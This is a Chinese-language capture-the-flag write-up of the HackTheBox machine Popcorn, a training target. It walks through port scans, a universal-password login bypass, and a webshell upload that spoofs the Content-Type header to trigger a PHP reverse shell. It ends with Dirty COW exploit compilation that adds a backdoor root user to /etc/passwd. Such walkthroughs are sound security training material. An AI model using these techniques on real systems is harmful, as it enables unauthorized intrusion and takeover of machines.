打靶记录(一四零)之HTBPopcorn

端口扫描

┌──(mikannse㉿kali)-[~/HTB/popcorn]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.6     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 20:56 CST
Nmap scan report for 10.10.10.6
Host is up (0.072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds

┌──(mikannse㉿kali)-[~/HTB/popcorn]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.6 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 20:57 CST
Nmap scan report for 10.10.10.6
Host is up (0.066s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Did not follow redirect to http://popcorn.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: AVM FRITZ!Box FON WLAN 7240 WAP (96%), Android 2.3.5 (Linux 2.6) (96%), Linux 2.6.17 - 2.6.36 (96%), Linux 2.6.32 (96%), Linux 2.6.17 (95%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Linux 2.6.30 (94%), Linux 2.6.35 (94%), Epson WF-2660 printer (94%), Linux 2.4.20 (Red Hat 7.2) (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds

添加hosts

Web

/test.php是一个phpinfo界面，发现php版本和系统版本都挺低的,/torrent是另一个界面，有登录框，万能密码直接绕过

扫一下目录，然后看一下别的功能

┌──(mikannse㉿kali)-[~/HTB/popcorn]
└─$ feroxbuster -u http://popcorn.htb/ -x rar,php,zip,sql,txt,html,bak --filter-status 404 -k

有一个上传功能，但是只能传种子文件

这里泄露了一个sql文件: http://popcorn.htb/torrent/database/th_database.sql

admin:admin12,但是没什么用

回到上传点，随便找一个torrent种子文件上传上去,在browser能够查看刚上传的种子信息,发现能够编辑缩略图，能够上传一个图片，再次尝试上传一个webshell,直接传一个大马，然后更改Content-type，像是:

Content-Disposition: form-data; name="file"; filename="php-reverse-shell.php"

Content-Type: image/png

来到之前扫出的/upload目录，触发php反弹shell

www-data@popcorn:/tmp$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux

提权

版本低的可怜，上脏牛,一开始用的是这个

Linux Kernel 2.6.22 < 3.9 (x86/x64) - ‘Dirty COW /proc/self/mem’ R | linux/local/40616.c

但是失败了,改用40839.c可以利用，上传.c到靶机，编译执行，输入一个密码来创建一个后门用户

www-data@popcorn:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@popcorn:/tmp$ chmod +x dirty
chmod +x dirty
www-data@popcorn:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root

Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash

mmap: b77b1000

到这一步之后卡住了，但是等待一会儿之后，中断这个shell，重新做反弹shell，发现用户成功创建,切换用户，已有root权限！

碎碎念

还是比较简单的房间，主要事Linux版本太老了233